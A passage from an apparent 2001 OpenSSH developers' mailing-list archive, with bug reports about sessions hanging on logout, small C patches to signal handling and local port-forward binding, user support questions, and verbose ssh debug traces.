2 support quite nicely. ;-) (stty modes are not correct, therefore can not use the shell) > > Let me know specifically what you want tested on Unixware and I'll > gladly do so. I have Unixware 2.1.3 and 2.03 systems to build on. > Unfortunately I have to defer all Unixware 7.x testing to someone else. > > I'm the guy that asked for SA_RESTART to be added so Protocol 2 would > work on Unixware, ...and am very willing to help solve problems so that > it remains. :) > > Thanks, > -Tom Rudnick > -- Tim Rice Multitalents (707) 887-1469 tim at multitalents.net From tim at multitalents.net Thu Jun 7 13:52:26 2001 From: tim at multitalents.net (Tim Rice) Date: Wed, 6 Jun 2001 20:52:26 -0700 (PDT) Subject: SSH connection hanging on logout In-Reply-To: <20010511005244.A16114@faui02.informatik.uni-erlangen.de> Message-ID: On Fri, 11 May 2001, Markus Friedl wrote: > On Thu, May 10, 2001 at 05:29:40PM -0500, mouring at etoh.eviladmin.org wrote: > > > hermione/home/jason-634: date ; ssh localhost 'sleep 20& exit' ; date > > > Thu May 10 15:01:54 PDT 2001 > > > Thu May 10 15:02:14 PDT 2001 > > > > > > > Is this really a valid test? > > no > > > This hangs for 20 seconds under OpenBSD > > also, but this is not what we are refering to. SSH into your FreeBSD box > > using an interactive shell then do: sleep 20&exit > > please, could someone with a system where: > $ ssh -t host > % sleep 1234 & > % exit > $ > hangs with openssh try whether rlogin hangs, too? Platform SSH hangs Rlogin hangs Solaris 7 Y N UnixWare 2.03 Y N UnixWare 2.13 Y N UnixWare 7.1.0 Y N SCO Open Sever 3 Y N SCO Open Server 5 Y N Redhat 6.2 Y N Caldera eServer 2.3 Y N Hmm, I've got source to Linux. > > if rlogin does not hang, could you please check the source of rlogin > and try to figure out how it handles the filedescriptors that connect > rlogind to the shell. what happes with the filedescriptors after the > shell dies? Nothing is jumping out at me. If you'd like to see for yourself, ftp://ftp.multitalents.net/pub/netkit-rsh-0.10.tgz (~50K) has rlogin/rlogind source in it. > > thanks, -m > -- Tim Rice Multitalents (707) 887-1469 tim at multitalents.net From ajf_nylorac at acm.org Sun Jun 10 09:48:06 2001 From: ajf_nylorac at acm.org (Albert John FitzPatrick III) Date: Sat, 9 Jun 2001 19:48:06 -0400 (EDT) Subject: [PATCH] Make "-L" local ports bind to "127.0.0.1" in openssh-2.9p1 Message-ID: diff -u -r -N openssh-2.9p1/channels.c openssh-2.9p1-ajf.1/channels.c --- openssh-2.9p1/channels.c Tue Apr 17 14:14:35 2001 +++ openssh-2.9p1-ajf.1/channels.c Wed Jun 6 23:25:36 2001 @@ -1815,13 +1815,25 @@ /* * getaddrinfo returns a loopback address if the hostname is * set to NULL and hints.ai_flags is not AI_PASSIVE + * + * Oh yeah? Setting hostname to NULL and hints.ai_flags to + * AI_PASSIVE on Red Hat Linux release 6.0 (Hedwig) with + * Linux kernel 2.2.14 does no such thing. On that system + * "::" and "0.0.0.0" (and maybe one other value which slips + * my memory) are returned. Setting hostname to "127.0.0.1" + * does the trick, at least for IPv4 uses; I don't know what + * it does for IPv6. Without this hack, local ("-L") tunnel + * end-points (which are supposed to be private unless "-g" + * or "-o 'GatewayPorts yes'" is specified when "ssh" is + * started) are [ab]usable by any host which has a route + * to/from the this host. */ memset(&hints, 0, sizeof(hints)); hints.ai_family = IPv4or6; hints.ai_flags = gateway_ports ? AI_PASSIVE : 0; hints.ai_socktype = SOCK_STREAM; snprintf(strport, sizeof strport, "%d", listen_port); - if (getaddrinfo(NULL, strport, &hints, &aitop) != 0) + if (getaddrinfo(gateway_ports ? NULL : "127.0.0.1", strport, &hints, &aitop) != 0) packet_disconnect("getaddrinfo: fatal error"); for (ai = aitop; ai; ai = ai->ai_next) { From Markus.Friedl at informatik.uni-erlangen.de Thu Jun 7 17:56:34 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Thu, 7 Jun 2001 09:56:34 +0200 Subject: SSH connection hanging on logout In-Reply-To: ; from tim@multitalents.net on Wed, Jun 06, 2001 at 08:52:26PM -0700 References: <20010511005244.A16114@faui02.informatik.uni-erlangen.de> Message-ID: <20010607095634.B2968@faui02.informatik.uni-erlangen.de> On Wed, Jun 06, 2001 at 08:52:26PM -0700, Tim Rice wrote: > > please, could someone with a system where: > > $ ssh -t host > > % sleep 1234 & > > % exit > > $ > > hangs with openssh try whether rlogin hangs, too? > > Platform SSH hangs Rlogin hangs > Solaris 7 Y N > UnixWare 2.03 Y N > UnixWare 2.13 Y N > UnixWare 7.1.0 Y N > SCO Open Sever 3 Y N > SCO Open Server 5 Y N > Redhat 6.2 Y N > Caldera eServer 2.3 Y N > > Hmm, I've got source to Linux. > > > > > if rlogin does not hang, could you please check the source of rlogin > > and try to figure out how it handles the filedescriptors that connect > > rlogind to the shell. what happes with the filedescriptors after the > > shell dies? > > Nothing is jumping out at me. If you'd like to see for yourself, > ftp://ftp.multitalents.net/pub/netkit-rsh-0.10.tgz (~50K) > has rlogin/rlogind source in it. sorry, i don't have the time to check linux/sco/solaris. (check behaviour on SIGCLD, pty handling, etc). however: Platform SSH hangs Rlogin hangs OpenBSD N N BSD/OS N N this is all i can do right now. -m From dbt at meat.net Thu Jun 7 18:53:11 2001 From: dbt at meat.net (David Terrell) Date: Thu, 7 Jun 2001 01:53:11 -0700 Subject: [PATCH] Make "-L" local ports bind to "127.0.0.1" in openssh-2.9p1 In-Reply-To: ; from ajf_nylorac@acm.org on Sat, Jun 09, 2001 at 07:48:06PM -0400 References: Message-ID: <20010607015311.A13215@pianosa.catch22.org> On Sat, Jun 09, 2001 at 07:48:06PM -0400, Albert John FitzPatrick III wrote: > + * Oh yeah? Setting hostname to NULL and hints.ai_flags to > + * AI_PASSIVE on Red Hat Linux release 6.0 (Hedwig) with > + * Linux kernel 2.2.14 does no such thing. On that system > + * "::" and "0.0.0.0" (and maybe one other value which slips > + * my memory) are returned. Setting hostname to "127.0.0.1" > + * does the trick, at least for IPv4 uses; I don't know what > + * it does for IPv6. Without this hack, local ("-L") tunnel > + * end-points (which are supposed to be private unless "-g" > + * or "-o 'GatewayPorts yes'" is specified when "ssh" is > + * started) are [ab]usable by any host which has a route > + * to/from the this host. Perhaps you should point your operating system vendor (or whomever they get their libc from) at RFC 2553: If the AI_PASSIVE bit is not set in the ai_flags member of the hints structure, then the returned socket address structure will be ready for a call to connect() (for a connection-oriented protocol) or either connect(), sendto(), or sendmsg() (for a connectionless protocol). In this case, if the nodename argument is a NULL pointer, then the IP address portion of the socket address structure will be set to the loopback address. -- David Terrell | "... a grandiose, wasteful drug war that will never dbt at meat.net | be won as long as so many Americans need to Nebcorp Prime Minister | anesthetize themselves to get through the day." http://wwn.nebcorp.com/ | -Camille Paglia From Markus.Friedl at informatik.uni-erlangen.de Thu Jun 7 19:20:21 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Thu, 7 Jun 2001 11:20:21 +0200 Subject: [PATCH] Make "-L" local ports bind to "127.0.0.1" in openssh-2.9p1 In-Reply-To: ; from ajf_nylorac@acm.org on Sat, Jun 09, 2001 at 07:48:06PM -0400 References: Message-ID: <20010607112021.A5965@faui02.informatik.uni-erlangen.de> can anyone confirm this broken linux behaviour? On Sat, Jun 09, 2001 at 07:48:06PM -0400, Albert John FitzPatrick III wrote: > diff -u -r -N openssh-2.9p1/channels.c openssh-2.9p1-ajf.1/channels.c > --- openssh-2.9p1/channels.c Tue Apr 17 14:14:35 2001 > +++ openssh-2.9p1-ajf.1/channels.c Wed Jun 6 23:25:36 2001 > @@ -1815,13 +1815,25 @@ > /* > * getaddrinfo returns a loopback address if the hostname is > * set to NULL and hints.ai_flags is not AI_PASSIVE > + * > + * Oh yeah? Setting hostname to NULL and hints.ai_flags to > + * AI_PASSIVE on Red Hat Linux release 6.0 (Hedwig) with > + * Linux kernel 2.2.14 does no such thing. On that system > + * "::" and "0.0.0.0" (and maybe one other value which slips > + * my memory) are returned. Setting hostname to "127.0.0.1" > + * does the trick, at least for IPv4 uses; I don't know what > + * it does for IPv6. Without this hack, local ("-L") tunnel > + * end-points (which are supposed to be private unless "-g" > + * or "-o 'GatewayPorts yes'" is specified when "ssh" is > + * started) are [ab]usable by any host which has a route > + * to/from the this host. > */ > memset(&hints, 0, sizeof(hints)); > hints.ai_family = IPv4or6; > hints.ai_flags = gateway_ports ? AI_PASSIVE : 0; > hints.ai_socktype = SOCK_STREAM; > snprintf(strport, sizeof strport, "%d", listen_port); > - if (getaddrinfo(NULL, strport, &hints, &aitop) != 0) > + if (getaddrinfo(gateway_ports ? NULL : "127.0.0.1", strport, &hints, &aitop) != 0) > packet_disconnect("getaddrinfo: fatal error"); > > for (ai = aitop; ai; ai = ai->ai_next) { > > From dominic.scott at actfs.co.uk Thu Jun 7 18:49:23 2001 From: dominic.scott at actfs.co.uk (Dominic Scott) Date: Thu, 7 Jun 2001 09:49:23 +0100 Subject: sshd failing to allow connections. Message-ID: <005b01c0ef2e$c056c520$255b100a@actfs.co.uk> HI Guys, On my Slackware-current firewall I cannot ssh into it. The tail of the syslog is :- Jun 1 10:56:15 firefly sshd[22176]: fatal: get_sock_port: getnameinfo NI_NUMERICSERV failed any ideas why I get this error? Although slack-current includes openssh I've actually built this one from source ( and openssl too ) in case it was a config issue with the slackware -current release (which is FYI actually the very lastest stuff - i.e. what will be in the next release of Slackware ). Also I note :- Jun 1 10:57:17 firefly inetd[73]: netbios-ns/udp server failing (looping), service terminated any ideas what's causing this. AFAIK everything else that I want is working fine. Dom. *********************************************************************** This message has been checked for all known viruses by the E-mail Virus Protection service, powered by MessageLabs. *********************************************************************** From openssh-unix-dev at thewrittenword.com Thu Jun 7 21:12:06 2001 From: openssh-unix-dev at thewrittenword.com (openssh-unix-dev at thewrittenword.com) Date: Thu, 7 Jun 2001 06:12:06 -0500 Subject: HPUX: ssh hangs after shell exit In-Reply-To: <3B1D4F85.FEF10A43@mail.microcenter.com>; from abush@microcenter.com on Tue, Jun 05, 2001 at 05:30:45PM -0400 References: <3B1D4F85.FEF10A43@mail.microcenter.com> Message-ID: <20010607061206.I14017@postal.il.thewrittenword.com> On Tue, Jun 05, 2001 at 05:30:45PM -0400, Aaron Bush wrote: > I am aware that there have been several posts related to ssh connections > hanging, i have tried to read through most of them in the archives... I > am posting this in hopes that it may present something new that will > further help resolve this problem. > > The problem i am having appears to be similar to what others have > reported where after typing exit in an interactive shell the connection > is not closed unitl an additional _one_ key stroke is issued (space-bar, > enter, etc...). > > The sshd server is OpenSSH_2.9p1 on HPUX-11.00. I have tried connecting > using the OpenSSH_2.9p1 ssh client from Linux-2.4, HPUX-11.00 and > FreeBSD-4.2. The behavior so far is _always_ consistent: We have *no* problems with 2.9p1 on HP-UX 11.00 here. We do use the HP commercial C compiler to build it. -- albert chin (china at thewrittenword.com) From openssh-unix-dev at thewrittenword.com Thu Jun 7 21:14:54 2001 From: openssh-unix-dev at thewrittenword.com (openssh-unix-dev at thewrittenword.com) Date: Thu, 7 Jun 2001 06:14:54 -0500 Subject: Unreviewed 2.9p1 patches? Message-ID: <20010607061453.J14017@postal.il.thewrittenword.com> Anyone get a chance to review the patches we submitted? http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=99041860215437&w=2 -- albert chin (china at thewrittenword.com) From nico at sonycom.com Thu Jun 7 21:53:46 2001 From: nico at sonycom.com (Nico De Ranter) Date: Thu, 7 Jun 2001 13:53:46 +0200 Subject: Bugreport?: TCP/IP forwarding problem (openssh 2.9p1) Message-ID: <20010607135346.I12366@immortelle.sonytel.be> Hi, I have a user who is trying to use SAP through SSH. SAP uses 2 ports: 3202 and 3602. This used to work with version 2.3.0p1 of openssh however with version 2.9p1 a connection is initiated on one of the ports but when the connection on the second port is setup the SAP client hangs and no traffic is seen on the network. Only 1 out of 5 connection attempts do seem to get through. When I start the 2.3.0p1 server again in stead of 2.9p1 everything works fine. The SSH client is TeraTerm Pro 2.3 with TTSSH 1.5.1. The server side runs Solaris 2.6 with openssl 0.9.6a and openssh 2.3.0p1 or 2.9p1. Any idea what might be wrong? Nico --------------------------------------------------------- "It has been said that there are only two businesses that refer to customers as users: illegal drug trade and the computer industry." --------------------------------------------------------- Nico De Ranter Sony Service Center (SDCE/NEE-B) Sint Stevens Woluwestraat 55 (Rue de Woluwe-Saint-Etienne) 1130 Brussel (Bruxelles), Belgium, Europe, Earth Telephone: +32 2 724 86 41 Telefax: +32 2 726 26 86 e-mail: nico.deranter at sonycom.com From Markus.Friedl at informatik.uni-erlangen.de Thu Jun 7 21:34:26 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Thu, 7 Jun 2001 13:34:26 +0200 Subject: HPUX: ssh hangs after shell exit In-Reply-To: <3B1D4F85.FEF10A43@mail.microcenter.com>; from abush@microcenter.com on Tue, Jun 05, 2001 at 05:30:45PM -0400 References: <3B1D4F85.FEF10A43@mail.microcenter.com> Message-ID: <20010607133426.A19581@faui02.informatik.uni-erlangen.de> On Tue, Jun 05, 2001 at 05:30:45PM -0400, Aaron Bush wrote: > 1) establish connection to sshd using ssh simply via "ssh remote-host" > 2) type exit in interactive shell on remote-host. > 3) "logout" is echoed to the terminal and the local shell prompt is NOT > echoed. > 4) type any other key, usually i just hit the space-bar. <<--PROBLEM IS > HERE > 5) "Connection to remote-host closed." is echoed to the terminal > followed by the local shell prompt. do you have ssh -v -v -v remote-host traces? From davidoliveira at universoproactiva.com Thu Jun 7 22:06:58 2001 From: davidoliveira at universoproactiva.com (David Oliveira) Date: Thu, 07 Jun 2001 12:06:58 +0000 Subject: authentication has failed Message-ID: <3B1F6E62.5080602@universoproactiva.com> dear sirs i am trying to install opensshd on my linux slackware 7.1. i just descompress the openssh tar gziped file and ./configure --sysconfdir=/etc/ssh ;make;make install ok! sshd to put ssh daemon running on memory and i try to connect to mysel (ssh -l username 127.0.0.1) i put my password but it fails! why? i'm doing something wrong?? thank you David Oliveira davidoliveira at universoproactiva.com From jason at dour.org Thu Jun 7 23:23:35 2001 From: jason at dour.org (Jason A . Dour) Date: Thu, 7 Jun 2001 09:23:35 -0400 Subject: HPUX: ssh hangs after shell exit In-Reply-To: <20010607133426.A19581@faui02.informatik.uni-erlangen.de>; from Markus.Friedl@informatik.uni-erlangen.de on Thu, Jun 07, 2001 at 01:34:26PM +0200 References: <3B1D4F85.FEF10A43@mail.microcenter.com> <20010607133426.A19581@faui02.informatik.uni-erlangen.de> Message-ID: <20010607092335.D17159@dour.org> On Thu, Jun 07, 2001 at 01:34:26PM +0200, Markus Friedl wrote: > On Tue, Jun 05, 2001 at 05:30:45PM -0400, Aaron Bush wrote: > > 1) establish connection to sshd using ssh simply via "ssh remote-host" > > 2) type exit in interactive shell on remote-host. > > 3) "logout" is echoed to the terminal and the local shell prompt is NOT > > echoed. > > 4) type any other key, usually i just hit the space-bar. <<--PROBLEM IS > > HERE > > 5) "Connection to remote-host closed." is echoed to the terminal > > followed by the local shell prompt. > > do you have > ssh -v -v -v remote-host > traces? I have HP/UX 11.00 installed on my machines at work, and I recently began deploying OpenSSH to them. I compiled it on our Development machine, and deployed it via tar/ftp to other machines. Our Devel machine does not exhibit the hang. However, our secondary development machine DOES exhibit the hang. Both of them have the same OS and patch-level as far as I can tell. Here's the debug output for the close of the sessions. FROM C3P0 TO DEVEL -- NO HANG: > ^[[1m-- jdour at devel (1/0) -- ~ --^[[0m^M^M > ^[[1m-:^[[0m logout^M > Logging out.^M > debug1: channel 0: rcvd eof^M > debug1: channel 0: output open -> drain^M > debug1: client_input_channel_req: channel 0 rtype exit-status reply 0^M > debug1: channel 0: rcvd close^M > debug1: channel 0: input open -> closed^M > debug1: channel 0: close_read^M > debug2: channel 0: no data after CLOSE^M > debug1: channel 0: obuf empty^M > debug1: channel 0: output drain -> closed^M > debug1: channel 0: close_write^M > debug1: channel 0: send close^M > debug1: channel 0: is dead^M > debug1: channel_free: channel 0: status: The following connections are open:^M > #0 client-session (t4 r0 i8/0 o128/0 fd -1/-1)^M > ^M > debug1: channel_free: channel 0: dettaching channel user^M > Connection to devel closed.^M^M > debug1: Transferred: stdin 0, stdout 0, stderr 29 bytes in 3.2 seconds^M^M > debug1: Bytes per second: stdin 0.0, stdout 0.0, stderr 9.1^M^M > debug1: Exit status 0^M^M > debug1: writing PRNG seed to file /home/jdour/.ssh/prng_seed^M^M > ^[[1m-- jdour at c3p0 (ttyp1/0) -- ~ --^[[0m^M^M > ^[[1m-:^[[0m exit^M FROM DEVEL TO C3P0 -- WITH HANG: > ^[[1m-- jdour at c3p0 (0/0) -- ~ --^[[0m^M^M > ^[[1m-:^[[0m logout^M > Logging out.^M > debug1: channel 0: rcvd eof^M > debug1: channel 0: output open -> drain^M > debug1: channel 0: obuf empty^M > debug1: channel 0: output drain -> closed^M > debug1: channel 0: close_write^M <##### HANG OCCURS HERE! > debug1: client_input_channel_req: channel 0 rtype exit-status reply 0^M > debug1: channel 0: rcvd close^M > debug1: channel 0: input open -> closed^M > debug1: channel 0: close_read^M > debug2: channel 0: no data after CLOSE^M > debug1: channel 0: send close^M > debug1: channel 0: is dead^M > debug1: channel_free: channel 0: status: The following connections are open:^M > #0 client-session (t4 r0 i8/0 o128/0 fd -1/-1)^M > ^M > debug1: channel_free: channel 0: dettaching channel user^M > Connection to c3p0 closed.^M^M > debug1: Transferred: stdin 0, stdout 0, stderr 28 bytes in 9.4 seconds^M^M > debug1: Bytes per second: stdin 0.0, stdout 0.0, stderr 3.0^M^M > debug1: Exit status 0^M^M > debug1: writing PRNG seed to file /home/jdour/.ssh/prng_seed^M^M > ^[[1m-- jdour at devel (ttyp1/0) -- ~ --^[[0m^M^M > ^[[1m-:^[[0m di^[[D ^[[D^[[D ^[[Dexit^M That's what I have... Any suggestions? Cheers, Jason # "Jason A. Dour" http://dour.org/ # Founder / Executive Producer - PJ Harvey Online - http://pjh.org/ From wooledg at eeg.ccf.org Thu Jun 7 23:28:32 2001 From: wooledg at eeg.ccf.org (Greg Wooledge) Date: Thu, 7 Jun 2001 09:28:32 -0400 Subject: Defect: OpenSSH hangs on logout In-Reply-To: ; from stevesk@pobox.com on Wed, Jun 06, 2001 at 02:16:13PM -0700 References: <20010606082224.C24958@eeg.ccf.org> Message-ID: <20010607092831.D24958@eeg.ccf.org> On Wed, Jun 06, 2001 at 02:16:13PM -0700, Kevin Steves wrote: > does 10.20 hang with 2.9 without the patch? with the patch? It hangs both with and without the patch. Every time. (It certainly doesn't act like a race condition, as someone else mentioned.) Just to refresh memories, this is the symptom: box1$ ssh somewhere somewhere$ sleep 500 & somewhere$ logout (hangs) Then, if I kill the sleep process in another window, the connection is immediately terminated and everything is back to normal. Using "nohup sleep 500 >/dev/null 2>&1 &" does the same thing. Using bash2's "disown" command doesn't help, either. From kaukasoi at elektroni.ee.tut.fi Fri Jun 8 00:27:06 2001 From: kaukasoi at elektroni.ee.tut.fi (Petri Kaukasoina) Date: Thu, 7 Jun 2001 17:27:06 +0300 Subject: Defect: OpenSSH hangs on logout In-Reply-To: <20010607092831.D24958@eeg.ccf.org>; from wooledg@eeg.ccf.org on Thu, Jun 07, 2001 at 09:28:32AM -0400 References: <20010606082224.C24958@eeg.ccf.org> <20010607092831.D24958@eeg.ccf.org> Message-ID: <20010607172706.A20234@elektroni.ee.tut.fi> On Thu, Jun 07, 2001 at 09:28:32AM -0400, Greg Wooledge wrote: > Using "nohup sleep 500 >/dev/null 2>&1 &" does the same thing. How about these: nohup sleep 500 >/dev/null 2>&1 &- 2>&- <&- & From cmadams at hiwaay.net Fri Jun 8 00:35:48 2001 From: cmadams at hiwaay.net (Chris Adams) Date: Thu, 7 Jun 2001 09:35:48 -0500 Subject: [PATCH] Make "-L" local ports bind to "127.0.0.1" in openssh-2.9p1 In-Reply-To: <20010607015311.A13215@pianosa.catch22.org>; from dbt@meat.net on Thu, Jun 07, 2001 at 01:53:11AM -0700 References: <20010607015311.A13215@pianosa.catch22.org> Message-ID: <20010607093548.C17961@HiWAAY.net> Once upon a time, David Terrell said: > On Sat, Jun 09, 2001 at 07:48:06PM -0400, Albert John FitzPatrick III wrote: > > + * Oh yeah? Setting hostname to NULL and hints.ai_flags to > > + * AI_PASSIVE on Red Hat Linux release 6.0 (Hedwig) with > > + * Linux kernel 2.2.14 does no such thing. On that system > > + * "::" and "0.0.0.0" (and maybe one other value which slips > > + * my memory) are returned. Setting hostname to "127.0.0.1" > > + * does the trick, at least for IPv4 uses; I don't know what > > + * it does for IPv6. Without this hack, local ("-L") tunnel > > + * end-points (which are supposed to be private unless "-g" > > + * or "-o 'GatewayPorts yes'" is specified when "ssh" is > > + * started) are [ab]usable by any host which has a route > > + * to/from the this host. > > Perhaps you should point your operating system vendor (or whomever they > get their libc from) at RFC 2553: > > If the AI_PASSIVE bit is not set in the ai_flags member of the hints > structure, then the returned socket address structure will be ready > for a call to connect() (for a connection-oriented protocol) or > either connect(), sendto(), or sendmsg() (for a connectionless > protocol). In this case, if the nodename argument is a NULL pointer, > then the IP address portion of the socket address structure will be > set to the loopback address. What you quoted is the opposite case of what the original patch changes. The patch changes behaviour if AI_PASSIVE _is_ set. According to the man page for getaddrinfo, if AI_PASSIVE is set and the node is NULL, "the network address in each socket structure will be left unspecified." The quoted comment is also misleading, as it is in response to the following comment that you snipped: * getaddrinfo returns a loopback address if the hostname is * set to NULL and hints.ai_flags is not AI_PASSIVE So the "does no such thing" part of the comment is incorrect because it is describing a different case. Looking at the patch, if it changes anything, then something is broken on the original poster's computer. The original code sets AI_PASSIVE only if gateway_ports is set, and then calls getaddrinfo with the node NULL. The new code changes the getaddrinfo to only get NULL when gateway_ports is set (and AI_PASSIVE is set). I just tested local port forwarding with Red Hat 7.1 and the OpenSSH RPMs from ftp.OpenBSD.org, and I do NOT see any problem (when I use -L, the port forwardings only work for localhost unless I also use "-o GatewayPorts=yes"). -- Chris Adams Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble. From abush at microcenter.com Thu Jun 7 23:57:48 2001 From: abush at microcenter.com (Aaron Bush) Date: Thu, 07 Jun 2001 09:57:48 -0400 Subject: HPUX: ssh hangs after shell exit References: <3B1D4F85.FEF10A43@mail.microcenter.com> <20010607061206.I14017@postal.il.thewrittenword.com> Message-ID: <3B1F885C.92328A94@mail.microcenter.com> openssh-unix-dev at thewrittenword.com wrote: > > On Tue, Jun 05, 2001 at 05:30:45PM -0400, Aaron Bush wrote: > > I am aware that there have been several posts related to ssh connections > > hanging, i have tried to read through most of them in the archives... I > > am posting this in hopes that it may present something new that will > > further help resolve this problem. > > > > The problem i am having appears to be similar to what others have > > reported where after typing exit in an interactive shell the connection > > is not closed unitl an additional _one_ key stroke is issued (space-bar, > > enter, etc...). > > > > The sshd server is OpenSSH_2.9p1 on HPUX-11.00. I have tried connecting > > using the OpenSSH_2.9p1 ssh client from Linux-2.4, HPUX-11.00 and > > FreeBSD-4.2. The behavior so far is _always_ consistent: > > We have *no* problems with 2.9p1 on HP-UX 11.00 here. We do use the HP > commercial C compiler to build it. > > -- > albert chin (china at thewrittenword.com) I am using gcc 2.95.2 and the problem does exist. I have not tried the HP ANSI C compiler though. -ab From abush at microcenter.com Fri Jun 8 00:04:03 2001 From: abush at microcenter.com (Aaron Bush) Date: Thu, 07 Jun 2001 10:04:03 -0400 Subject: HPUX: ssh hangs after shell exit References: Message-ID: <3B1F89D3.6598D9@mail.microcenter.com> Kevin Steves wrote: > can you try the patch at the end? hp-ux (and possibly the other systems > you mentioned) restart select() when SA_RESTART which we were setting for > SIGCHLD, and we should not have select() restarted. > > > Index: misc.c > =================================================================== > RCS file: /var/cvs/openssh/misc.c,v > retrieving revision 1.20 > diff -u -r1.20 misc.c > --- misc.c 2001/05/12 00:08:38 1.20 > +++ misc.c 2001/06/05 20:55:54 > @@ -220,7 +220,7 @@ > memset(&sa, 0, sizeof(sa)); > sigemptyset(&sa.sa_mask); > sa.sa_flags = 0; > -#if defined(SA_RESTART) > +#if 0 > if (sig == SIGCHLD) > sa.sa_flags |= SA_RESTART; > #endif Sorry for the delay in reponse... This patch has corrected the problems i have been having. I have been looking for documentation from HP regarding the behavior of SA_RESTART and have found nothing so far. Thanks, -ab From abush at microcenter.com Fri Jun 8 00:06:31 2001 From: abush at microcenter.com (Aaron Bush) Date: Thu, 07 Jun 2001 10:06:31 -0400 Subject: HPUX: ssh hangs after shell exit References: <3B1D4F85.FEF10A43@mail.microcenter.com> <20010607133426.A19581@faui02.informatik.uni-erlangen.de> Message-ID: <3B1F8A67.548EFBE@mail.microcenter.com> Markus Friedl wrote: > > On Tue, Jun 05, 2001 at 05:30:45PM -0400, Aaron Bush wrote: > > 1) establish connection to sshd using ssh simply via "ssh remote-host" > > 2) type exit in interactive shell on remote-host. > > 3) "logout" is echoed to the terminal and the local shell prompt is NOT > > echoed. > > 4) type any other key, usually i just hit the space-bar. <<--PROBLEM IS > > HERE > > 5) "Connection to remote-host closed." is echoed to the terminal > > followed by the local shell prompt. > > do you have > ssh -v -v -v remote-host > traces? Sure here is the debug to a HPUX 11.00 host that is still setting SA_RESTART: OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL 0x0090600f debug1: Reading configuration data /home/abush/.ssh/config debug1: Applying options for * debug1: Reading configuration data /etc/ssh/ssh_config debug1: Seeding random number generator debug1: Rhosts Authentication disabled, originating port will not be trusted. debug1: restore_uid debug1: ssh_connect: getuid 500 geteuid 0 anon 1 debug1: Connecting to k200 [10.10.1.10] port 22. debug1: temporarily_use_uid: 500/500 (e=0) debug1: restore_uid debug1: temporarily_use_uid: 500/500 (e=0) debug1: restore_uid debug1: Connection established. debug1: read PEM private key done: type DSA debug1: read PEM private key done: type RSA debug1: identity file /home/abush/.ssh/identity type -1 debug1: identity file /home/abush/.ssh/id_rsa type -1 debug3: No RSA1 key file /home/abush/.ssh/id_dsa. debug2: key_type_from_name: unknown key type '-----BEGIN' debug3: key_read: no key found debug2: key_type_from_name: unknown key type 'Proc-Type:' debug3: key_read: no key found debug2: key_type_from_name: unknown key type 'DEK-Info:' debug3: key_read: no key found debug3: key_read: no space debug3: key_read: no space debug3: key_read: no space debug3: key_read: no space debug3: key_read: no space debug3: key_read: no space debug3: key_read: no space debug3: key_read: no space debug3: key_read: no space debug3: key_read: no space debug2: key_type_from_name: unknown key type '-----END' debug3: key_read: no key found debug1: identity file /home/abush/.ssh/id_dsa type 2 debug1: Remote protocol version 1.99, remote software version OpenSSH_2.9p1 debug1: match: OpenSSH_2.9p1 pat ^OpenSSH Enabling compatibility mode for protocol 2.0 debug1: Local version string SSH-2.0-OpenSSH_2.9p1 debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1 debug2: kex_parse_kexinit: ssh-rsa,ssh-dss debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc at lysator.liu.se debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc at lysator.liu.se debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: none debug2: kex_parse_kexinit: none debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: first_kex_follows 0 debug2: kex_parse_kexinit: reserved 0 debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1 debug2: kex_parse_kexinit: ssh-dss debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc at lysator.liu.se debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc at lysator.liu.se debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: none,zlib debug2: kex_parse_kexinit: none,zlib debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: first_kex_follows 0 debug2: kex_parse_kexinit: reserved 0 debug2: mac_init: found hmac-md5 debug1: kex: server->client aes128-cbc hmac-md5 none debug2: mac_init: found hmac-md5 debug1: kex: client->server aes128-cbc hmac-md5 none debug1: SSH2_MSG_KEX_DH_GEX_REQUEST sent debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP debug1: dh_gen_key: priv key bits set: 124/256 debug1: bits set: 1042/2049 debug1: SSH2_MSG_KEX_DH_GEX_INIT sent debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY debug3: check_host_in_hostfile: filename /home/abush/.ssh/known_hosts2 debug3: check_host_in_hostfile: match line 8 debug3: check_host_in_hostfile: filename /home/abush/.ssh/known_hosts2 debug3: check_host_in_hostfile: match line 8 debug1: Host 'k200' is known and matches the DSA host key. debug1: Found key in /home/abush/.ssh/known_hosts2:8 debug1: bits set: 1034/2049 debug1: len 55 datafellows 0 debug1: ssh_dss_verify: signature correct debug1: kex_derive_keys debug1: 